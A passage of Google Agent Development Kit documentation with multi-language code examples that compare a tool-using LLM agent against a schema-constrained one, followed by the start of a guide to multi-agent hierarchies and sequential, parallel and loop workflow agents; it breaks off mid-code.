print(json.dumps(parsed_output, indent=2)) except (json.JSONDecodeError, TypeError): # Otherwise, print as string print(stored_output) print("-" * 30) # --- 7. Run Interactions --- async def main(): # Create separate sessions for clarity, though not strictly necessary if context is managed print("--- Creating Sessions ---") await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID_TOOL_AGENT) await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID_SCHEMA_AGENT) print("--- Testing Agent with Tool ---") await call_agent_and_print(capital_runner, capital_agent_with_tool, SESSION_ID_TOOL_AGENT, '{"country": "France"}') await call_agent_and_print(capital_runner, capital_agent_with_tool, SESSION_ID_TOOL_AGENT, '{"country": "Canada"}') print("\n\n--- Testing Agent with Output Schema (No Tool Use) ---") await call_agent_and_print(structured_runner, structured_info_agent_schema, SESSION_ID_SCHEMA_AGENT, '{"country": "France"}') await call_agent_and_print(structured_runner, structured_info_agent_schema, SESSION_ID_SCHEMA_AGENT, '{"country": "Japan"}') # --- Run the Agent --- # Note: In Colab, you can directly use 'await' at the top level. # If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop. if __name__ == "__main__": asyncio.run(main()) ``` ```javascript // Copyright 2025 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. import { LlmAgent, FunctionTool, InMemoryRunner, isFinalResponse } from '@google/adk'; import { createUserContent, Schema, Type } from '@google/genai'; import type { Part } from '@google/genai'; import { z } from 'zod'; // --- 1. Define Constants --- const APP_NAME = "capital_app_ts"; const USER_ID = "test_user_789"; const SESSION_ID_TOOL_AGENT = "session_tool_agent_ts"; const SESSION_ID_SCHEMA_AGENT = "session_schema_agent_ts"; const MODEL_NAME = "gemini-2.5-flash"; // Using flash for speed // --- 2. Define Schemas --- // A. Schema for the Tool's parameters (using Zod) const CountryInput = z.object({ country: z.string().describe('The country to get the capital for.'), }); // B. Output schema ONLY for the second agent (using ADK's Schema type) const CapitalInfoOutputSchema: Schema = { type: Type.OBJECT, description: "Schema for capital city information.", properties: { capital: { type: Type.STRING, description: "The capital city of the country." }, population_estimate: { type: Type.STRING, description: "An estimated population of the capital city." }, }, required: ["capital", "population_estimate"], }; // --- 3. Define the Tool (Only for the first agent) --- async function getCapitalCity(params: z.infer): Promise<{ result: string }> { console.log(`\n-- Tool Call: getCapitalCity(country='${params.country}') --`); const capitals: Record = { 'united states': 'Washington, D.C.', 'canada': 'Ottawa', 'france': 'Paris', 'japan': 'Tokyo', }; const result = capitals[params.country.toLowerCase()] ?? `Sorry, I couldn't find the capital for ${params.country}.`; console.log(`-- Tool Result: '${result}' --`); return { result: result }; // Tools must return an object } // --- 4. Configure Agents --- // Agent 1: Uses a tool and outputKey const getCapitalCityTool = new FunctionTool({ name: 'get_capital_city', description: 'Retrieves the capital city for a given country', parameters: CountryInput, execute: getCapitalCity, }); const capitalAgentWithTool = new LlmAgent({ model: MODEL_NAME, name: 'capital_agent_tool', description: 'Retrieves the capital city using a specific tool.', instruction: `You are a helpful agent that provides the capital city of a country using a tool. The user will provide the country name in a JSON format like {"country": "country_name"}. 1. Extract the country name. 2. Use the \`get_capital_city\` tool to find the capital. 3. Respond with a JSON object with the key 'capital' and the value as the capital city. `, tools: [getCapitalCityTool], outputKey: "capital_tool_result", // Store final text response }); // Agent 2: Uses outputSchema (NO tools possible) const structuredInfoAgentSchema = new LlmAgent({ model: MODEL_NAME, name: 'structured_info_agent_schema', description: 'Provides capital and estimated population in a specific JSON format.', instruction: `You are an agent that provides country information. The user will provide the country name in a JSON format like {"country": "country_name"}. Respond ONLY with a JSON object matching this exact schema: ${JSON.stringify(CapitalInfoOutputSchema, null, 2)} Use your knowledge to determine the capital and estimate the population. Do not use any tools. `, // *** NO tools parameter here - using outputSchema prevents tool use *** outputSchema: CapitalInfoOutputSchema, outputKey: "structured_info_result", }); // --- 5. Define Agent Interaction Logic --- async function callAgentAndPrint( runner: InMemoryRunner, agent: LlmAgent, sessionId: string, queryJson: string ) { console.log(`\n>>> Calling Agent: '${agent.name}' | Query: ${queryJson}`); const message = createUserContent(queryJson); let finalResponseContent = "No final response received."; for await (const event of runner.runAsync({ userId: USER_ID, sessionId: sessionId, newMessage: message })) { if (isFinalResponse(event) && event.content?.parts?.length) { finalResponseContent = event.content.parts.map((part: Part) => part.text ?? '').join(''); } } console.log(`<<< Agent '${agent.name}' Response: ${finalResponseContent}`); // Check the session state const currentSession = await runner.sessionService.getSession({ appName: APP_NAME, userId: USER_ID, sessionId: sessionId }); if (!currentSession) { console.log(`--- Session not found: ${sessionId} ---`); return; } const storedOutput = currentSession.state[agent.outputKey!]; console.log(`--- Session State ['${agent.outputKey}']: `); try { // Attempt to parse and pretty print if it's JSON const parsedOutput = JSON.parse(storedOutput as string); console.log(JSON.stringify(parsedOutput, null, 2)); } catch (e) { // Otherwise, print as a string console.log(storedOutput); } console.log("-".repeat(30)); } // --- 6. Run Interactions --- async function main() { // Set up runners for each agent const capitalRunner = new InMemoryRunner({ appName: APP_NAME, agent: capitalAgentWithTool }); const structuredRunner = new InMemoryRunner({ appName: APP_NAME, agent: structuredInfoAgentSchema }); // Create sessions console.log("--- Creating Sessions ---"); await capitalRunner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID_TOOL_AGENT }); await structuredRunner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID_SCHEMA_AGENT }); console.log("\n--- Testing Agent with Tool ---"); await callAgentAndPrint(capitalRunner, capitalAgentWithTool, SESSION_ID_TOOL_AGENT, '{"country": "France"}'); await callAgentAndPrint(capitalRunner, capitalAgentWithTool, SESSION_ID_TOOL_AGENT, '{"country": "Canada"}'); console.log("\n\n--- Testing Agent with Output Schema (No Tool Use) ---"); await callAgentAndPrint(structuredRunner, structuredInfoAgentSchema, SESSION_ID_SCHEMA_AGENT, '{"country": "France"}'); await callAgentAndPrint(structuredRunner, structuredInfoAgentSchema, SESSION_ID_SCHEMA_AGENT, '{"country": "Japan"}'); } main(); ``` ```go package main import ( "context" "encoding/json" "errors" "fmt" "log" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) // --- Main Runnable Example --- const ( modelName = "gemini-2.0-flash" appName = "agent_comparison_app" userID = "test_user_456" ) type getCapitalCityArgs struct { Country string `json:"country" jsonschema:"The country to get the capital of."` } // getCapitalCity retrieves the capital city of a given country. func getCapitalCity(ctx tool.Context, args getCapitalCityArgs) (map[string]any, error) { fmt.Printf("\n-- Tool Call: getCapitalCity(country='%s') --\n", args.Country) capitals := map[string]string{ "united states": "Washington, D.C.", "canada": "Ottawa", "france": "Paris", "japan": "Tokyo", } capital, ok := capitals[strings.ToLower(args.Country)] if !ok { result := fmt.Sprintf("Sorry, I couldn't find the capital for %s.", args.Country) fmt.Printf("-- Tool Result: '%s' --\n", result) return nil, errors.New(result) } fmt.Printf("-- Tool Result: '%s' --\n", capital) return map[string]any{"result": capital}, nil } // callAgent is a helper function to execute an agent with a given prompt and handle its output. func callAgent(ctx context.Context, a agent.Agent, outputKey string, prompt string) { fmt.Printf("\n>>> Calling Agent: '%s' | Query: %s\n", a.Name(), prompt) // Create an in-memory session service to manage agent state. sessionService := session.InMemoryService() // Create a new session for the agent interaction. sessionCreateResponse, err := sessionService.Create(ctx, &session.CreateRequest{ AppName: appName, UserID: userID, }) if err != nil { log.Fatalf("Failed to create the session service: %v", err) } session := sessionCreateResponse.Session // Configure the runner with the application name, agent, and session service. config := runner.Config{ AppName: appName, Agent: a, SessionService: sessionService, } // Create a new runner instance. r, err := runner.New(config) if err != nil { log.Fatalf("Failed to create the runner: %v", err) } // Prepare the user's message to send to the agent. sessionID := session.ID() userMsg := &genai.Content{ Parts: []*genai.Part{ genai.NewPartFromText(prompt), }, Role: string(genai.RoleUser), } // Run the agent and process the streaming events. for event, err := range r.Run(ctx, userID, sessionID, userMsg, agent.RunConfig{ StreamingMode: agent.StreamingModeSSE, }) { if err != nil { fmt.Printf("\nAGENT_ERROR: %v\n", err) } else if event.Partial { // Print partial responses as they are received. for _, p := range event.Content.Parts { fmt.Print(p.Text) } } } // After the run, check if there's an expected output key in the session state. if outputKey != "" { storedOutput, error := session.State().Get(outputKey) if error == nil { // Pretty-print the stored output if it's a JSON string. fmt.Printf("\n--- Session State ['%s']: ", outputKey) storedString, isString := storedOutput.(string) if isString { var prettyJSON map[string]interface{} if err := json.Unmarshal([]byte(storedString), &prettyJSON); err == nil { indentedJSON, err := json.MarshalIndent(prettyJSON, "", " ") if err == nil { fmt.Println(string(indentedJSON)) } else { fmt.Println(storedString) } } else { fmt.Println(storedString) } } else { fmt.Println(storedOutput) } fmt.Println(strings.Repeat("-", 30)) } } } func main() { ctx := context.Background() model, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { log.Fatalf("Failed to create model: %v", err) } capitalTool, err := functiontool.New( functiontool.Config{ Name: "get_capital_city", Description: "Retrieves the capital city for a given country.", }, getCapitalCity, ) if err != nil { log.Fatalf("Failed to create function tool: %v", err) } countryInputSchema := &genai.Schema{ Type: genai.TypeObject, Description: "Input for specifying a country.", Properties: map[string]*genai.Schema{ "country": { Type: genai.TypeString, Description: "The country to get information about.", }, }, Required: []string{"country"}, } capitalAgentWithTool, err := llmagent.New(llmagent.Config{ Name: "capital_agent_tool", Model: model, Description: "Retrieves the capital city using a specific tool.", Instruction: `You are a helpful agent that provides the capital city of a country using a tool. The user will provide the country name in a JSON format like {"country": "country_name"}. 1. Extract the country name. 2. Use the 'get_capital_city' tool to find the capital. 3. Respond clearly to the user, stating the capital city found by the tool.`, Tools: []tool.Tool{capitalTool}, InputSchema: countryInputSchema, OutputKey: "capital_tool_result", }) if err != nil { log.Fatalf("Failed to create capital agent with tool: %v", err) } capitalInfoOutputSchema := &genai.Schema{ Type: genai.TypeObject, Description: "Schema for capital city information.", Properties: map[string]*genai.Schema{ "capital": { Type: genai.TypeString, Description: "The capital city of the country.", }, "population_estimate": { Type: genai.TypeString, Description: "An estimated population of the capital city.", }, }, Required: []string{"capital", "population_estimate"}, } schemaJSON, _ := json.Marshal(capitalInfoOutputSchema) structuredInfoAgentSchema, err := llmagent.New(llmagent.Config{ Name: "structured_info_agent_schema", Model: model, Description: "Provides capital and estimated population in a specific JSON format.", Instruction: fmt.Sprintf(`You are an agent that provides country information. The user will provide the country name in a JSON format like {"country": "country_name"}. Respond ONLY with a JSON object matching this exact schema: %s Use your knowledge to determine the capital and estimate the population. Do not use any tools.`, string(schemaJSON)), InputSchema: countryInputSchema, OutputSchema: capitalInfoOutputSchema, OutputKey: "structured_info_result", }) if err != nil { log.Fatalf("Failed to create structured info agent: %v", err) } fmt.Println("--- Testing Agent with Tool ---") callAgent(ctx, capitalAgentWithTool, "capital_tool_result", `{"country": "France"}`) callAgent(ctx, capitalAgentWithTool, "capital_tool_result", `{"country": "Canada"}`) fmt.Println("\n\n--- Testing Agent with Output Schema (No Tool Use) ---") callAgent(ctx, structuredInfoAgentSchema, "structured_info_result", `{"country": "France"}`) callAgent(ctx, structuredInfoAgentSchema, "structured_info_result", `{"country": "Japan"}`) } ``` ```java // --- Full example code demonstrating LlmAgent with Tools vs. Output Schema --- import com.google.adk.agents.LlmAgent; import com.google.adk.events.Event; import com.google.adk.runner.Runner; import com.google.adk.sessions.InMemorySessionService; import com.google.adk.sessions.Session; import com.google.adk.tools.Annotations; import com.google.adk.tools.FunctionTool; import com.google.genai.types.Content; import com.google.genai.types.Part; import com.google.genai.types.Schema; import io.reactivex.rxjava3.core.Flowable; import java.util.HashMap; import java.util.List; import java.util.Map; import java.util.Optional; public class LlmAgentExample { // --- 1. Define Constants --- private static final String MODEL_NAME = "gemini-2.0-flash"; private static final String APP_NAME = "capital_agent_tool"; private static final String USER_ID = "test_user_456"; private static final String SESSION_ID_TOOL_AGENT = "session_tool_agent_xyz"; private static final String SESSION_ID_SCHEMA_AGENT = "session_schema_agent_xyz"; // --- 2. Define Schemas --- // Input schema used by both agents private static final Schema COUNTRY_INPUT_SCHEMA = Schema.builder() .type("OBJECT") .description("Input for specifying a country.") .properties( Map.of( "country", Schema.builder() .type("STRING") .description("The country to get information about.") .build())) .required(List.of("country")) .build(); // Output schema ONLY for the second agent private static final Schema CAPITAL_INFO_OUTPUT_SCHEMA = Schema.builder() .type("OBJECT") .description("Schema for capital city information.") .properties( Map.of( "capital", Schema.builder() .type("STRING") .description("The capital city of the country.") .build(), "population_estimate", Schema.builder() .type("STRING") .description("An estimated population of the capital city.") .build())) .required(List.of("capital", "population_estimate")) .build(); // --- 3. Define the Tool (Only for the first agent) --- // Retrieves the capital city of a given country. public static Map getCapitalCity( @Annotations.Schema(name = "country", description = "The country to get capital for") String country) { System.out.printf("%n-- Tool Call: getCapitalCity(country='%s') --%n", country); Map countryCapitals = new HashMap<>(); countryCapitals.put("united states", "Washington, D.C."); countryCapitals.put("canada", "Ottawa"); countryCapitals.put("france", "Paris"); countryCapitals.put("japan", "Tokyo"); String result = countryCapitals.getOrDefault( country.toLowerCase(), "Sorry, I couldn't find the capital for " + country + "."); System.out.printf("-- Tool Result: '%s' --%n", result); return Map.of("result", result); // Tools must return a Map } public static void main(String[] args){ LlmAgentExample agentExample = new LlmAgentExample(); FunctionTool capitalTool = FunctionTool.create(agentExample.getClass(), "getCapitalCity"); // --- 4. Configure Agents --- // Agent 1: Uses a tool and output_key LlmAgent capitalAgentWithTool = LlmAgent.builder() .model(MODEL_NAME) .name("capital_agent_tool") .description("Retrieves the capital city using a specific tool.") .instruction( """ You are a helpful agent that provides the capital city of a country using a tool. 1. Extract the country name. 2. Use the `get_capital_city` tool to find the capital. 3. Respond clearly to the user, stating the capital city found by the tool. """) .tools(capitalTool) .inputSchema(COUNTRY_INPUT_SCHEMA) .outputKey("capital_tool_result") // Store final text response .build(); // Agent 2: Uses an output schema LlmAgent structuredInfoAgentSchema = LlmAgent.builder() .model(MODEL_NAME) .name("structured_info_agent_schema") .description("Provides capital and estimated population in a specific JSON format.") .instruction( String.format(""" You are an agent that provides country information. Respond ONLY with a JSON object matching this exact schema: %s Use your knowledge to determine the capital and estimate the population. Do not use any tools. """, CAPITAL_INFO_OUTPUT_SCHEMA.toJson())) // *** NO tools parameter here - using output_schema prevents tool use *** .inputSchema(COUNTRY_INPUT_SCHEMA) .outputSchema(CAPITAL_INFO_OUTPUT_SCHEMA) // Enforce JSON output structure .outputKey("structured_info_result") // Store final JSON response .build(); // --- 5. Set up Session Management and Runners --- InMemorySessionService sessionService = new InMemorySessionService(); sessionService.createSession(APP_NAME, USER_ID, null, SESSION_ID_TOOL_AGENT).blockingGet(); sessionService.createSession(APP_NAME, USER_ID, null, SESSION_ID_SCHEMA_AGENT).blockingGet(); Runner capitalRunner = new Runner(capitalAgentWithTool, APP_NAME, null, sessionService); Runner structuredRunner = new Runner(structuredInfoAgentSchema, APP_NAME, null, sessionService); // --- 6. Run Interactions --- System.out.println("--- Testing Agent with Tool ---"); agentExample.callAgentAndPrint( capitalRunner, capitalAgentWithTool, SESSION_ID_TOOL_AGENT, "{\"country\": \"France\"}"); agentExample.callAgentAndPrint( capitalRunner, capitalAgentWithTool, SESSION_ID_TOOL_AGENT, "{\"country\": \"Canada\"}"); System.out.println("\n\n--- Testing Agent with Output Schema (No Tool Use) ---"); agentExample.callAgentAndPrint( structuredRunner, structuredInfoAgentSchema, SESSION_ID_SCHEMA_AGENT, "{\"country\": \"France\"}"); agentExample.callAgentAndPrint( structuredRunner, structuredInfoAgentSchema, SESSION_ID_SCHEMA_AGENT, "{\"country\": \"Japan\"}"); } // --- 7. Define Agent Interaction Logic --- public void callAgentAndPrint(Runner runner, LlmAgent agent, String sessionId, String queryJson) { System.out.printf( "%n>>> Calling Agent: '%s' | Session: '%s' | Query: %s%n", agent.name(), sessionId, queryJson); Content userContent = Content.fromParts(Part.fromText(queryJson)); final String[] finalResponseContent = {"No final response received."}; Flowable eventStream = runner.runAsync(USER_ID, sessionId, userContent); // Stream event response eventStream.blockingForEach(event -> { if (event.finalResponse() && event.content().isPresent()) { event .content() .get() .parts() .flatMap(parts -> parts.isEmpty() ? Optional.empty() : Optional.of(parts.get(0))) .flatMap(Part::text) .ifPresent(text -> finalResponseContent[0] = text); } }); System.out.printf("<<< Agent '%s' Response: %s%n", agent.name(), finalResponseContent[0]); // Retrieve the session again to get the updated state Session updatedSession = runner .sessionService() .getSession(APP_NAME, USER_ID, sessionId, Optional.empty()) .blockingGet(); if (updatedSession != null && agent.outputKey().isPresent()) { // Print to verify if the stored output looks like JSON (likely from output_schema) System.out.printf("--- Session State ['%s']: ", agent.outputKey().get()); } } } ``` *(This example demonstrates the core concepts. More complex agents might incorporate schemas, context control, planning, etc.)* ## Related Concepts (Deferred Topics) While this page covers the core configuration of `LlmAgent`, several related concepts provide more advanced control and are detailed elsewhere: - **Callbacks:** Intercepting execution points (before/after model calls, before/after tool calls) using `before_model_callback`, `after_model_callback`, etc. See [Callbacks](https://google.github.io/adk-docs/callbacks/types-of-callbacks/index.md). - **Multi-Agent Control:** Advanced strategies for agent interaction, including planning (`planner`), controlling agent transfer (`disallow_transfer_to_parent`, `disallow_transfer_to_peers`), and system-wide instructions (`global_instruction`). See [Multi-Agents](https://google.github.io/adk-docs/agents/multi-agents/index.md). # Multi-Agent Systems in ADK Supported in ADKPython v0.1.0Typescript v0.2.0Go v0.1.0Java v0.1.0 As agentic applications grow in complexity, structuring them as a single, monolithic agent can become challenging to develop, maintain, and reason about. The Agent Development Kit (ADK) supports building sophisticated applications by composing multiple, distinct `BaseAgent` instances into a **Multi-Agent System (MAS)**. In ADK, a multi-agent system is an application where different agents, often forming a hierarchy, collaborate or coordinate to achieve a larger goal. Structuring your application this way offers significant advantages, including enhanced modularity, specialization, reusability, maintainability, and the ability to define structured control flows using dedicated workflow agents. You can compose various types of agents derived from `BaseAgent` to build these systems: - **LLM Agents:** Agents powered by large language models. (See [LLM Agents](https://google.github.io/adk-docs/agents/llm-agents/index.md)) - **Workflow Agents:** Specialized agents (`SequentialAgent`, `ParallelAgent`, `LoopAgent`) designed to manage the execution flow of their sub-agents. (See [Workflow Agents](https://google.github.io/adk-docs/agents/workflow-agents/index.md)) - **Custom agents:** Your own agents inheriting from `BaseAgent` with specialized, non-LLM logic. (See [Custom Agents](https://google.github.io/adk-docs/agents/custom-agents/index.md)) The following sections detail the core ADK primitives—such as agent hierarchy, workflow agents, and interaction mechanisms—that enable you to construct and manage these multi-agent systems effectively. ## 1. ADK Primitives for Agent Composition ADK provides core building blocks—primitives—that enable you to structure and manage interactions within your multi-agent system. Note The specific parameters or method names for the primitives may vary slightly by SDK language (e.g., `sub_agents` in Python, `subAgents` in Java). Refer to the language-specific API documentation for details. ### 1.1. Agent Hierarchy (Parent agent, Sub Agents) The foundation for structuring multi-agent systems is the parent-child relationship defined in `BaseAgent`. - **Establishing Hierarchy:** You create a tree structure by passing a list of agent instances to the `sub_agents` argument when initializing a parent agent. ADK automatically sets the `parent_agent` attribute on each child agent during initialization. - **Single Parent Rule:** An agent instance can only be added as a sub-agent once. Attempting to assign a second parent will result in a `ValueError`. - **Importance:** This hierarchy defines the scope for [Workflow Agents](#workflow-agents-as-orchestrators) and influences the potential targets for LLM-Driven Delegation. You can navigate the hierarchy using `agent.parent_agent` or find descendants using `agent.find_agent(name)`. ```python # Conceptual Example: Defining Hierarchy from google.adk.agents import LlmAgent, BaseAgent # Define individual agents greeter = LlmAgent(name="Greeter", model="gemini-2.0-flash") task_doer = BaseAgent(name="TaskExecutor") # Custom non-LLM agent # Create parent agent and assign children via sub_agents coordinator = LlmAgent( name="Coordinator", model="gemini-2.0-flash", description="I coordinate greetings and tasks.", sub_agents=[ # Assign sub_agents here greeter, task_doer ] ) # Framework automatically sets: # assert greeter.parent_agent == coordinator # assert task_doer.parent_agent == coordinator ``` ```typescript // Conceptual Example: Defining Hierarchy import { LlmAgent, BaseAgent, InvocationContext } from '@google/adk'; import type { Event, createEventActions } from '@google/adk'; class TaskExecutorAgent extends BaseAgent { async *runAsyncImpl(context: InvocationContext): AsyncGenerator { yield { id: 'event-1', invocationId: context.invocationId, author: this.name, content: { parts: [{ text: 'Task completed!' }] }, actions: createEventActions(), timestamp: Date.now(), }; } async *runLiveImpl(context: InvocationContext): AsyncGenerator { this.runAsyncImpl(context); } } // Define individual agents const greeter = new LlmAgent({name: 'Greeter', model: 'gemini-2.5-flash'}); const taskDoer = new TaskExecutorAgent({name: 'TaskExecutor'}); // Custom non-LLM agent // Create parent agent and assign children via subAgents const coordinator = new LlmAgent({ name: 'Coordinator', model: 'gemini-2.5-flash', description: 'I coordinate greetings and tasks.', subAgents: [ // Assign subAgents here greeter, taskDoer ], }); // Framework automatically sets: // console.assert(greeter.parentAgent === coordinator); // console.assert(taskDoer.parentAgent === coordinator); ``` ```go import ( "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" ) // Conceptual Example: Defining Hierarchy // Define individual agents greeter, _ := llmagent.New(llmagent.Config{Name: "Greeter", Model: m}) taskDoer, _ := agent.New(agent.Config{Name: "TaskExecutor"}) // Custom non-LLM agent // Create parent agent and assign children via sub_agents coordinator, _ := llmagent.New(llmagent.Config{ Name: "Coordinator", Model: m, Description: "I coordinate greetings and tasks.", SubAgents: []agent.Agent{greeter, taskDoer}, // Assign sub_agents here }) ``` ```java // Conceptual Example: Defining Hierarchy import com.google.adk.agents.SequentialAgent; import com.google.adk.agents.LlmAgent; // Define individual agents LlmAgent greeter = LlmAgent.builder().name("Greeter").model("gemini-2.0-flash").build(); SequentialAgent taskDoer = SequentialAgent.builder().name("TaskExecutor").subAgents(...).build(); // Sequential Agent // Create parent agent and assign sub_agents LlmAgent coordinator = LlmAgent.builder() .name("Coordinator") .model("gemini-2.0-flash") .description("I coordinate greetings and tasks") .subAgents(greeter, taskDoer) // Assign sub_agents here .build(); // Framework automatically sets: // assert greeter.parentAgent().equals(coordinator); // assert taskDoer.parentAgent().equals(coordinator); ``` ### 1.2. Workflow Agents as Orchestrators ADK includes specialized agents derived from `BaseAgent` that don't perform tasks themselves but orchestrate the execution flow of their `sub_agents`. - **[`SequentialAgent`](https://google.github.io/adk-docs/agents/workflow-agents/sequential-agents/index.md):** Executes its `sub_agents` one after another in the order they are listed. - **Context:** Passes the *same* [`InvocationContext`](https://google.github.io/adk-docs/runtime/index.md) sequentially, allowing agents to easily pass results via shared state. ```python # Conceptual Example: Sequential Pipeline from google.adk.agents import SequentialAgent, LlmAgent step1 = LlmAgent(name="Step1_Fetch", output_key="data") # Saves output to state['data'] step2 = LlmAgent(name="Step2_Process", instruction="Process data from {data}.") pipeline = SequentialAgent(name="MyPipeline", sub_agents=[step1, step2]) # When pipeline runs, Step2 can access the state['data'] set by Step1. ``` ```typescript // Conceptual Example: Sequential Pipeline import { SequentialAgent, LlmAgent } from '@google/adk'; const step1 = new LlmAgent({name: 'Step1_Fetch', outputKey: 'data'}); // Saves output to state['data'] const step2 = new LlmAgent({name: 'Step2_Process', instruction: 'Process data from {data}.'}); const pipeline = new SequentialAgent({name: 'MyPipeline', subAgents: [step1, step2]}); // When pipeline runs, Step2 can access the state['data'] set by Step1. ``` ```go import ( "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/agent/workflowagents/sequentialagent" ) // Conceptual Example: Sequential Pipeline step1, _ := llmagent.New(llmagent.Config{Name: "Step1_Fetch", OutputKey: "data", Model: m}) // Saves output to state["data"] step2, _ := llmagent.New(llmagent.Config{Name: "Step2_Process", Instruction: "Process data from {data}.", Model: m}) pipeline, _ := sequentialagent.New(sequentialagent.Config{ AgentConfig: agent.Config{Name: "MyPipeline", SubAgents: []agent.Agent{step1, step2}}, }) // When pipeline runs, Step2 can access the state["data"] set by Step1. ``` ```java // Conceptual Example: Sequential Pipeline import com.google.adk.agents.SequentialAgent; import com.google.adk.agents.LlmAgent; LlmAgent step1 = LlmAgent.builder().name("Step1_Fetch").outputKey("data").build(); // Saves output to state.get("data") LlmAgent step2 = LlmAgent.builder().name("Step2_Process").instruction("Process data from {data}.").build(); SequentialAgent pipeline = SequentialAgent.builder().name("MyPipeline").subAgents(step1, step2).build(); // When pipeline runs, Step2 can access the state.get("data") set by Step1. ``` - **[`ParallelAgent`](https://google.github.io/adk-docs/agents/workflow-agents/parallel-agents/index.md):** Executes its `sub_agents` in parallel. Events from sub-agents may be interleaved. - **Context:** Modifies the `InvocationContext.branch` for each child agent (e.g., `ParentBranch.ChildName`), providing a distinct contextual path which can be useful for isolating history in some memory implementations. - **State:** Despite different branches, all parallel children access the *same shared* `session.state`, enabling them to read initial state and write results (use distinct keys to avoid race conditions). ```python # Conceptual Example: Parallel Execution from google.adk.agents import ParallelAgent, LlmAgent fetch_weather = LlmAgent(name="WeatherFetcher", output_key="weather") fetch_news = LlmAgent(name="NewsFetcher", output_key="news") gatherer = ParallelAgent(name="InfoGatherer", sub_agents=[fetch_weather, fetch_news]) # When gatherer runs, WeatherFetcher and NewsFetcher run concurrently. # A subsequent agent could read state['weather'] and state['news']. ``` ```typescript // Conceptual Example: Parallel Execution import { ParallelAgent, LlmAgent } from '@google/adk'; const fetchWeather = new LlmAgent({name: 'WeatherFetcher', outputKey: 'weather'}); const fetchNews = new LlmAgent({name: 'NewsFetcher', outputKey: 'news'}); const gatherer = new ParallelAgent({name: 'InfoGatherer', subAgents: [fetchWeather, fetchNews]}); // When gatherer runs, WeatherFetcher and NewsFetcher run concurrently. // A subsequent agent could read state['weather'] and state['news']. ``` ```go import ( "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/agent/workflowagents/parallelagent" ) // Conceptual Example: Parallel Execution fetchWeather, _ := llmagent.New(llmagent.Config{Name: "WeatherFetcher", OutputKey: "weather", Model: m}) fetchNews, _ := llmagent.New(llmagent.Config{Name: "NewsFetcher", OutputKey: "news", Model: m}) gatherer, _ := parallelagent.New(parallelagent.Config{ AgentConfig: agent.Config{Name: "InfoGatherer", SubAgents: []agent.Agent{fetchWeather, fetchNews}}, }) // When gatherer runs, WeatherFetcher and NewsFetcher run concurrently. // A subsequent agent could read state["weather"] and state["news"]. ``` ```java // Conceptual Example: Parallel Execution import com.google.adk.agents.LlmAgent; import com.google.adk.agents.ParallelAgent; LlmAgent fetchWeather = LlmAgent.builder() .name("WeatherFetcher") .outputKey("weather") .build(); LlmAgent fetchNews = LlmAgent.builder() .name("NewsFetcher") .instruction("news") .build(); ParallelAgent gatherer = ParallelAgent.builder() .name("InfoGatherer") .subAgents(fetchWeather, fetchNews) .build(); // When gatherer runs, WeatherFetcher and NewsFetcher run concurrently. // A subsequent agent could read state['weather'] and state['news']. ``` - **[`LoopAgent`](https://google.github.io/adk-docs/agents/workflow-agents/loop-agents/index.md):** Executes its `sub_agents` sequentially in a loop. - **Termination:** The loop stops if the optional `max_iterations` is reached, or if any sub-agent returns an [`Event`](https://google.github.io/adk-docs/events/index.md) with `escalate=True` in its Event Actions. - **Context & State:** Passes the *same* `InvocationContext` in each iteration, allowing state changes (e.g., counters, flags) to persist across loops. ```python # Conceptual Example: Loop with Condition from google.adk.agents import LoopAgent, LlmAgent, BaseAgent from google.adk.events import Event, EventActions from google.adk.agents.invocation_context import InvocationContext from typing import AsyncGenerator class CheckCondition(BaseAgent): # Custom agent to check state async def _run_async_impl(self, ctx: InvocationContext) -> AsyncGenerator[Event, None]: status = ctx.session.state.get("status", "pending") is_done = (status == "completed") yield Event(author=self.name, actions=EventActions(escalate=is_done)) # Escalate if done process_step = LlmAgent(name="ProcessingStep") # Agent that might update state['status'] poller = LoopAgent( name="StatusPoller", max_iterations=10, sub_agents=[process_step, CheckCondition(name="Checker")] ) # When poller runs, it executes process_step then Checker repeatedly # until Checker escalates (state['status'] == 'completed') or 10 iterations pass. ``` ```typescript // Conceptual Example: Loop with Condition import { LoopAgent, LlmAgent, BaseAgent, InvocationContext } from '@google/adk'; import type { Event, createEventActions, EventActions } from '@google/adk'; class CheckConditionAgent extends BaseAgent { // Custom agent to check state async *runAsyncImpl(ctx: InvocationContext): AsyncGenerator { const status = ctx.session.state['status'] || 'pending'; const isDone = status === 'completed'; yield createEvent({ author: 'check_condition', actions: createEventActions({ escalate: isDone }) }); } async *runLiveImpl(ctx: InvocationContext): AsyncGenerator { // This is not implemented. } }; const processStep = new LlmAgent({name: 'ProcessingStep'}); // Agent that might update state['status'] const poller = new LoopAgent({ name: 'StatusPoller', maxIterations: 10, // Executes its sub_agents sequentially in a loop subAgents: [processStep, new CheckConditionAgent ({name: 'Checker'})] }); // When poller runs, it executes processStep then Checker repeatedly // until Checker escalates (state['status'] === 'completed') or 10 iterations pass. ``` ```go import ( "iter" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/agent/workflowagents/loopagent" "google.golang.org/adk/session" ) // Conceptual Example: Loop with Condition // Custom agent to check state checkCondition, _ := agent.New(agent.Config{ Name: "Checker", Run: func(ctx agent.InvocationContext) iter.Seq2[*session.Event, error] { return func(yield func(*session.Event, error) bool) { status, err := ctx.Session().State().Get("status") // If "status" is not in the state, default to "pending". // This is idiomatic Go for handling a potential error on lookup. if err != nil { status = "pending" } isDone := status == "completed" yield(&session.Event{Author: 